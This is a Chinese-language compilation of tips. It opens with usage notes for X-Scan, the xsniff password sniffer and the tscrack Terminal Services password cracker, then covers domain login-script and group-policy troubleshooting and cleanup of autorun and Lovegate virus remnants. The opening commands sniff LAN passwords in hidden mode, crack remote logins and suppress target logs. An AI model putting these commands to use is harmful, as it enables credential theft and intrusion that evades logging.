xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的所有主機的標准埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放埠的主機

#9 九：

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接（多線程）
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用－f後面的密碼
-F 間隔時間（頻率）

5. 如何禁用域控伺服器下發的腳本

1、bat可以作為登陸腳本執行，確切說一切可以在windows平台執行的東西都可以作為登陸腳本來用。

2、應該指定以\\server\……這樣格式開頭的路徑。因為client在登陸的時候執行腳本，其實是從伺服器上下載到本地，然後執行。這樣的話，如果指定c:\這樣的路徑，client只會在本地的c盤查找，而不是到server上的路徑去查找。

3、腳本可以放在一切client能夠讀取的位置。通常這個位置處於\\server\netlogon的share下(在伺服器上的位置是%systemroot%\sysvol\sysvol\domainname\scripts)，但是如果你制訂了策略，那麼腳本默認的存放路徑應該在%systemroot%\sysvol\sysvol\domainname\policies\guid\user(machine)\scripts下，如果你放在別的位置，需要在腳本執行欄的位置輸入絕對路徑，格式同樣需要以\\server\……開頭。

4、其他的問題也很多了，一般來說就是腳本適用於策略的時候，客戶端可能會執行不到。

一般來說可能會有一下的幾個原因：

a、腳本從名稱到內容都盡可能的不要用特殊字元、長文件名(超過8個字元)、空格，比如&等。這樣的腳本在不同的os上可能執行會有問題。

b、腳本存放的位置和路徑，請遵照上面的原則來做。

c、腳本的編寫方面。特別是適用net use 來map一個fileserver上的路徑。有可能在登陸之前，client上已經有網路盤的映射，如果恰好和你map的盤符一樣，將有可能導致腳本執行失敗，你可以在腳本的最前面加一句net use * /d /y來解決這個問題。

不過這個命令要慎用，在實際生產環境中，如果你的fileserver是非wintel平台的storage，響應時間較長，那麼可能導致用戶重新登陸時，無法連接fileserver上的sharefolder，可以用一句if exist來判斷網路盤是否存在。

另外一個方面，如果遠程設備是一些跨平台的存儲設備，比如一些nas、san等，map到windows平台的時候可能會提示「網路路徑無法連接」等問題，可以相互更換map \\server_netbios_name或者map \\server_ipaddress兩種方式來嘗試連接。

如果遇到許可權問題，那麼按照共享許可權和安全許可權沖突時取最小值的原則，一般來講可以將共享許可權設置為full control，然後安全許可權做嚴格設定的辦法來解決。

d、「配置文件路經」和「登陸腳本路徑」、「主文件夾」

朋友們在初次設置域賬戶腳本的時候，可能對於這三個概念有些模糊，難以區分，這里說明一下：

①使用組策略，在用戶登錄腳本的的地方編輯一個cmd等，使用諸如net use的方式就可以map一個網路盤符了。

②「配製文件路徑」是指用戶profile所處的位置，通常在%userprofile%

「登錄腳本路徑」是指用戶登錄到伺服器時，執行的腳本所處的位置，通常默認路徑位於

伺服器上的netlogon下，如果制定策略中使用腳本，默認的路徑應該在gpo 的guid下的user或者computer下的scripts，如果置於其他位置，需要手動指定完全路徑。

③「主文件夾」是指用戶在fileserver上的個人主目錄，這個概念沒有絕對的位置。需要你手動指定路徑，不過在這里寫入和在腳本中寫入的不同，在於系統會根據你寫入的路徑，自動創建文件夾，並為該用戶分配許可權，該文件夾的owner屬於該用戶。這里可以使用%username%的變數，讓系統自行完成。當然在指定了 主目錄後，你仍然可以訪問其他有許可權使用的資源。

e、關於策略的執行順序是本機、站點、域、ou、子ou。如果有設置上的重復，按照執行的順序，後面的設置將會覆蓋前面的設置。

如果在ou上設置「block policy inheritance」，那麼上層的策略將不會在這一層獲得執行。

如果在ou上設置「No override」，那麼這一層將不會被後面的策略設置覆蓋，也就是說即使後面有相同的設置，仍然以這一層的設置為准。

如果在ou上設置「disabled」，那麼這個策略將會被禁止執行。

如果在策略的properties security上取消了對應的組的read和apply group policy，那麼對應的組將會無法應用到策略。通常默認被應用的組有authenticated user。

如果你取消了該組的兩個許可權，然後add其他組，同樣賦予read和apply group policy的話，此策略將只會被該組執行到，這也就是所謂的filter。

如果你的域中有多台dc，可能需要在dssite.msc中手動同步它們。

你也可以在伺服器上使用secedit /refreshpolicy user_policy(machine_policy) /enforce 來強制刷新策略

這樣的辦法同樣適用於client。

f、執行的腳本，可以放在computer configuration和user configuration中執行。

對於user，通常可以放置更改用戶屬性的東西。

對於computer，通常可以放置更改計算機屬性的東西。

這兩個沒有絕對界限，但通常登陸的時候，都屬於domain users成員，這樣如果需要更改注冊表或系統文件之類的，可能會遇到許可權問題，那麼我們也可以把這樣的腳本放在computer中，這樣可以在user登陸之前獲得執行。
(這里順帶說一句：大家很少用到計算機賬戶吧，那麼計算機賬戶的作用在這里可以得到體現，由於此時還沒有用戶賬戶驗證，計算機賬戶和dc的驗證有一方面來源於本地計算機賬戶和dc之間保持一個密碼同步，以便於在這種特殊的情況下獲得驗證，該密碼默認30天變更一次。

你甚至可以在sharefolder上添加計算機賬戶的許可權：)如果由於dns對應或者其他的一些原因，導致這個密碼無法同步，dc將會無法驗證該計算機賬戶，這可能會導致計算機登陸腳本無法執行。在dc的日誌上一般都會給出一個錯誤提示，ComputerNetbiosName$無法存取。解決的辦法，可以通過在客戶端上執行netdom重置該信任關系，這是另話了。)

對於user的設定，只需要登出然後登入即可獲得腳本的應用。

對於computer的設定，則需要重新啟動機器來獲得腳本的執行。

註：從上面的幾點中，大家可以看到計算機在登陸的時候需要通過dns來定位dc，從而定位

定位gpo，sysvol(策略、腳本、管理模板都存放在這里)，dns對於ad的設置是至關重要

的，一般來說可以這樣設置，將客戶端的dns指向dc(如果dc上是雙網卡的話，那麼指向內部

網卡dns)，然後在dc上設置轉發，forward到外部(isp)dns。

上面只是就一些常見的問題做簡要介紹，如果遇到更為復雜的問題，就需要查閱其他資料來解決了。

關於大家平時遇到的問題，都整理成faq放在下面

FAQ：

我的配置過程如下：

1、製作腳本文件config.bat並拷貝至域控制器伺服器下的sysvol\sysvol\scripts目錄下
該腳本文件用 net use z: \\linux_file\share 命令

2、配置「配製文件路徑」：路徑指向：\\nwf_sav(域控制伺服器名)\netlogon

配置「登錄腳本路徑」： config.bat

3、在客戶機注銷重新登陸時出現以下窗口：但未能將共享文件夾映射為Z盤。

回答：一般腳本的存放位置有兩種觀點：

1、將登陸腳本放在\\server\netlogon下(在dc上的物理路徑是 %systemroot%\SYSVOL\sysvol\domainname\SCRIPTS ，而不是 sysvol\sysvol\scripts)

在設置賬戶屬性中登陸指令檔的時候，此時是登陸域的時候默認尋找登陸腳本的位置

如果需要修改該腳本，需要手動定位到上面的路徑，

優點是腳本集中放置

2、將登陸腳本放在策略gpo所處的路徑下(在dc上的物理路徑類似於這樣

\\domainname\SysVol\domainname\Policies\{142B4268-9574-471F-9F7F-9AA04836F57F}\User\Scripts\Logon，這里一長串的數字是gpo的guid，用來唯一的標識這個對象，

可以通過查詢該策略的屬性，來察看該guid)

在設置策略中登入指令檔的時候，此時是登陸域的時候默認尋找登陸腳本的位置

如果需要修改該腳本，可以點擊下方的「顯示檔案」

優點是和策略關聯性強，編輯查找方便

無論用哪種方法，如果腳本放置在默認的查詢路徑，指定登陸檔的時候就不用寫路徑

如果不是，就需要填寫完整路徑，當然這個路徑需要對於client可用，也就是說

不能填寫諸如 c:\winnt\sysvol\sysvol 這樣的路徑，否則client在登陸的時候，只會

在自己的機器上 c:\winnt\sysvol\sysvol 查找腳本，顯然是找不到的，因為腳本

是下載到本地執行的。

那麼我們先看看腳本是否能夠在client上正確執行，

在client上 winkey+r，然後填入腳本的路徑，比如 \\servername\netlogon\config.bat

執行一下，是否能夠等到正確的結果？

然後察看上面的位置中指定的路徑是否正確

如果是通過策略指定的登陸腳本，我們再用 gpresult /v ，察看一下client是否應用到了

您制定的策略，如果沒有就要考慮使用 dssite.msc 手動同步域中的所有dc，然後

secedit /refreshpolicy user_policy (machine_policy)/enforce 強制刷新策略，

然後client重新登陸或者重新啟動一下(這取決於您制訂的是用戶登陸腳本還是計算機登陸腳本)

如果還是不行，那麼在早先的那篇文章有提到，

有可能是由於本地已經map 了同樣盤符的盤，導致沖突

有可能是由於map的共享路徑許可權設置錯誤，常見的是共享許可權的設置問題

有可能是由於map的共享是跨平台的存儲設備或者格式，它們可能不能在登陸時在系統要求的

時間內響應，這導致系統認為該資源超時連接，不可用。您可以嘗試更換netbios名稱或者ip

6. 電腦C盤E盤都打不開，顯示無法找到腳本，怎麼辦

有這么幾種，1、中毒了，殺！（好象是歡樂時光之類的），先用殺毒軟體殺一次。
2、你雙擊硬碟不能打開,可能是你修改了左鍵第一個默認"打開"把他改成了其它不可運行的命令，你可以試著打開資源管理器,點工具-文件夾選項(win98和winxp略有區別)--文件類型,找到驅動器那欄,點高級,就可以編輯有關驅動器的打開方式了,默認是find,如果你面有幾個選項,你可以選擇刪除其它選項,或者選中find,點設置默認**,就可以了
1、如果各分區下帶autorun.inf一類的隱藏文件，刪除後最好重新啟動電腦。
2、在文件類型中重新設置打開方式（以XP為例）
打開 我的電腦－－工具－－文件夾選項－－文件類型，找到「驅動器」或「文件夾」（具體選哪個根據你所遇問題，若屬於雙擊打不開驅動器則選擇「驅動器」，打不開文件夾則選擇「文件夾」）。點下方的「高級」，在「編輯文件類型」對話框里的「新建」，操作里填寫「open」（這個可隨意填寫，如果有「open」且指向的是其他陌生的.exe文件則有可能指向的是木馬，則選擇「編輯」），用於執行操作的應用程序里填寫explorer.exe，確定。隨後返回到「編輯文件類型」窗口，選中「open」，設為默認值，確定。現在再打開分區或文件夾看下，是不是已恢復正常？
3、注冊表法：
a、對於分區不能雙擊打開者
開始－－運行－－輸入regedit，找到[HKEY_CLASSES_ROOT\Drive\shell]將shell下的全部刪除，然後關閉注冊表，按鍵盤F5刷新，雙擊分區再看。
b、對於文件夾不能雙擊打開者
開始－－運行－－輸入regedit，找到[HKEY_CLASSES_ROOT\Directory\shell]將shell下的全部刪除，然後關閉注冊表，按鍵盤F5刷新，雙擊分區再看。
或者：

中了病毒，解決方案如下：
愛情後門的後遺症解決方案,也就是硬碟不能雙擊打開.
(這個問題我在咱們論壇求了好幾天,看來求人不如求己.今天我把解決的方法告訴大家,給大家一個幫助.)
病毒變向感染可執行文件
病毒可能會將EXE文件改名為ZMX文件，並設置屬性為「隱藏」和「系統」，如：病毒搜索到
一個名為「Winword.exe」的文件，會將其改名「Winword.zmx」並設置屬性「隱藏」和「系
統」，然後釋放一個名為「Winword.exe」的病毒復本。
這個功能的條件是：病毒運行後，每隔一小時會檢查系統中是否有「網路映射驅動器」和
「可移動驅器」，如果有，側會進行上述變相的文件感染。
? 手動清除：
該病毒手工清除比較困難，建議使用殺毒軟體或專殺工具，推薦到安全模式查殺。
注意：如果您的機器上有「可移動磁碟」和「網路映射驅動器」時，請注意搜索所有的
「*.zmx」文件，找到後請將其後綴改名為exe。推薦使用專殺工具來清除，可以自動恢復被病
毒改名的正常文件。
cmd中通過下面這條命令改回屬性：attrib -s -h *.zmx /s（在發現zmx文件的磁碟跟目錄下運行，如：F:\>attrib -s -h *.zmx /s)
如果你嫌一個一個改文件後綴名很煩，可以新建一個txt文件。輸入如下內容:
@dir /b /s *.zmx>zmx_file.txt
@for /f "delims==" %%a in (zmx_file.txt) do ren "%%a" *.exe
@del zmx_file.txt
然後保存成lovegate_rename_files.bat。把此文件到發現zmx文件的磁碟跟目錄下，雙擊。
d、e、f、g盤（如果有的話）雙擊不能直接打開，說Windows無法找到COMMAND.EXE文件，要求定位該文件，定位為C:\\windows\\explorer之後每次打開會提示「/StartExplorer」出錯，然後依然能打開驅動器文件夾。
這是殺毒軟體沒有搞定，留下的後遺症
解決方法如下： 病毒在你的每個驅動器下面寫入了一個AutoRun.inf文件內容為： open="X:\\command.exe" /StartExplorer X為驅動器盤符.
所以，如果你沒有殺毒，每次點開/D/E/F/G盤都會激活病毒瑞星比較笨不會幫你搞定這個問題（就算升級到最新版也沒有用，瑞星網站上專殺也無法解決，且無相關說明），需要自己手工解決。解決方法如下(以D盤為例)：
開始運行 cmd（打開命令提示符） D: dir /a （沒有參數A是看不到的，A是顯示所有的意思）此時你會發現一個autorun.inf文件，約49位元組 attrib autorun.inf -s -h -r 去掉autorun.inf文件的系統、只讀、隱藏屬性，否則無法刪除 del autorun.inf 到這里還沒完，因為你雙擊了D盤盤符沒有打開卻得到一個錯誤。
要求定位command.exe，這個時候自動運行的信息已經加入注冊表了。下面清除注冊表中相關信息：開始運行 regedit 編輯查找 command.exe 找到的第一個就是D盤的自動運行，刪除整個shell子鍵完畢，雙擊D盤，是不是可以打開了？
重復以上操作數次，解決其他驅動器的問題，注冊表中的信息是在一起的，在刪除D盤 Shell\\Open\\Autorun的時候順便都刪除了吧。